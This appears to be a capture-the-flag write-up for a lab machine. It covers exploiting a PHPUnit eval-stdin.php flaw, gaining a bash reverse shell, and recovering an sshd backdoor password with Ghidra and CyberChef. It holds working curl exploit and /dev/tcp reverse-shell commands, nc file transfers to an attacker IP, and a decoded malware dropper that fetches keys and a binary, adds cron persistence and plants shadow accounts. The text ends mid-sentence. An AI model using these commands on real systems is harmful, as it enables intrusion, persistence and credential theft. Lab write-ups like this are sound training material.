Engagement flow
Enumeration
We start off with a basic namp scan and learn about 2 ports. So this is clearly a narrow attack surface,
Web Enumeration
We start off by browsing to the website.
Clicking visit store brings us to
http://store.djewelry.htb/
Looking under the login tab we found a notice that discloses sensitive information.
Directory busting revealed a /vendor/ directory
Taking a look at the vendor directory.
Initial foothold
Look up CVE for all php modules
Determine phpsec is vulnerable
research and exploit for command injection
Create a reverse shell
Looking for CVE's for PHPunit was the most attractive as we had an easy one right off the bat.
Looking around I found this payload here
https://gist.github.com/yassineaboukir/1501de6f60dce148824d3001e83fb263
curl --data "<?php echo(id());" http:///store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
From here I added a command to the end and it worked!
curl --data "<?php echo(id());" http:///store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php ; echo id
From here we can execute a reverse shell with the following;
curl --data "<?php system(\"bash -c 'bash -i >& /dev/tcp/10.10.14.14/6363 0>&1'\");" http:///store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
USER
Observe file in var backups folder "info"
cat file and extract string
Decode in CyberChef
Crack the hash
Login as user
From here we noticed that we could execute a binary in the var www folder.
www-data@production:/var/backups$ ls -la
ls -la
total 736
drwxr-xr-x 2 root root 4096 Jul 2 06:25 .
drwxr-xr-x 13 root root 4096 Feb 8 19:59 ..
-rw-r--r-- 1 root root 51200 Jul 2 06:25 alternatives.tar.0
-rw-r--r-- 1 root root 34011 Feb 8 19:05 apt.extended_states.0
-rw-r--r-- 1 root root 268 Jun 4 2021 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Jul 4 2021 dpkg.statoverride.0
-rw-r--r-- 1 root root 615929 Feb 8 19:06 dpkg.status.0
-r-x------ 1 www-data www-data 27296 May 14 2021 info
www-data@production:/var/backups$
Using cat on the file and just checking the tail portion revealed a hexadecimal string. Taking this we can input the string into CyberChef.
ffff/bin/bash-c776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b20776765742074656d7066696c65732e78797a2f2e6d61696e202d4f202f7661722f6c69622f2e6d61696e3b2063686d6f6420373535202f7661722f6c69622f2e6d61696e3b206563686f20222a2033202a202a202a20726f6f74202f7661722f6c69622f2e6d61696e22203e3e202f6574632f63726f6e7461623b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122313a5c24365c247a5337796b4866464d673361596874345c2431495572685a616e5275445a6866316f49646e6f4f76586f6f6c4b6d6c77626b656742586b2e567447673738654c3757424d364f724e7447625a784b427450753855666d39684d30522f424c6441436f513054396e2f3a31383831333a303a39393939393a373a3a3a203e3e202f6574632f736861646f7722297d27202f6574632f7061737377643b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122202224332220222436222022243722203e2075736572732e74787422297d27202f6574632f7061737377643b207768696c652072656164202d7220757365722067726f757020686f6d65207368656c6c205f3b20646f206563686f202224757365722231223a783a2467726f75703a2467726f75703a2c2c2c3a24686f6d653a247368656c6c22203e3e202f6574632f7061737377643b20646f6e65203c2075736572732e7478743b20726d2075736572732e7478743b[-] fork()/etc/shadow[.] checking if we got root[-] something went wrong =([+] got r00t ^_^[-] unshare(CLONE_NEWUSER)deny/proc/self/setgroups[-] write_file(/proc/self/set_groups)0 %d 1
I realized the c at the start of the string was actually a flag to the bash command. So I removed this and the Hex decoded.
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
From here we can see that we have a hash in the above photo. From here I will use hashid to confirm once it is properly formatted. At first I had no success until I realized there were back slashes being used to escape the $ sign passed in the bash command. Once I removed this, the hash id binary successfully identified the hash as SHA-512 Crypt. I was able to crack the hash and connect in over ssh as user steven.
Root
Internal enumeration linpeas
Browse to /var/mail and read internal note
Identify and strings module reader for a encoded user command
Download sshd binary
Decompile and extract password from sshd binary
We browse to /var/mail and find this note.
Hi Steven.
We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he
will generate a temporary password for you to authenticate to the temporary server.
Thanks,
sysadmin
My first instinct is to check apache2 logs but we have access to none of them. I start looking through the /etc/apache2 files and notice that in the mods-enabled we have one mod that stands out as being newly added.
We noticed the file added to /usr/sbin/ssh
We go to download the file with
We download the mod_reader.so file and find nothing.
nc -w 1 10.10.14.14 2323 < /usr/lib/apache2/modules/mod_reader.so
nc -nlvp 2323 > file.so
We move to the sshd binay now.
nc -w 1 10.10.14.14 2323 < /usr/sbin/sshd
nc -nlvp 2323 > sshd
We analyze this file with static binary analyses and learn of auth_password.
From here we open the file in Ghidra and search for auth_passwords and find a backdoor function.
We have to align this in CyberChef. The way we do this is by working from the top memory address in the backdoor payload in Ghidra. We also have to view the 0x5b and learn this is actually being represented as 0xa5. We then have to place this value on the top as it represents the array size of our payload. We then have to swap endianness with the word length of 31 as per Ghidra backdoor variable. We remove the pad incomplete words.
We add the From Hex with a space delimiter. We then learned thanks to the forums that there was an XOR function and we could see the key 96 next to the XOR function. This provided our final password :)
0xa5
0xa9f4
0xbcf0b5e3
0xb2d6f4a0fda0b3d6
0xfdb3d6e7
0xf7bbfdc8
0xa4b3a3f3
0xf0e7abd6
backdoor._28_2_ = 0xa9f4;
ppVar1 = ctxt->pw;
iVar8 = ctxt->valid;
backdoor._24_4_ = 0xbcf0b5e3;
backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
backdoor[30] = -0x5b;
backdoor._0_4_ = 0xf0e7abd6;
backdoor._4_4_ = 0xa4b3a3f3;
backdoor._8_4_ = 0xf7bbfdc8;
backdoor._12_4_ = 0xfdb3d6e7;
0xa5
0xa9f4
0xbcf0b5e3
0xb2d6f4a0fda0b3d6
0xfdb3d6e7
0xf7bbfdc8
0xa4b3a3f3
0xf0e7abd6
Once we have ordered the payload,
Comments